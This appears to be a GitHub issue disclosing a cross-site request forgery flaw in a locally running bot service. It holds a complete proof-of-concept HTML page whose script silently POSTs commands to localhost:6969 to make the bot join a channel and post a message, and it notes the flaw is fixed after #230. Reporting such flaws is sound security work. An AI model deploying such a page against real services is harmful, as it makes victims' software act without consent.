Open rexim opened 4 years ago
Exploit:
<!DOCTYPE html>
<html>
<head>
<title>Not an Exploit Kapp</title>
</head>
<body>
<h1>Ya got CSRF-ed bruh LOOOOL</h1>
<script>
const form = new FormData();
form.append('cd', 'cd #tsoding');
form.append('say', 'say you got CSRF-ed :)');
fetch("http://localhost:6969/", {
method: 'POST',
body: form
});
</script>
</body>
</html>
UPD Does not work after #230
kgbotka.log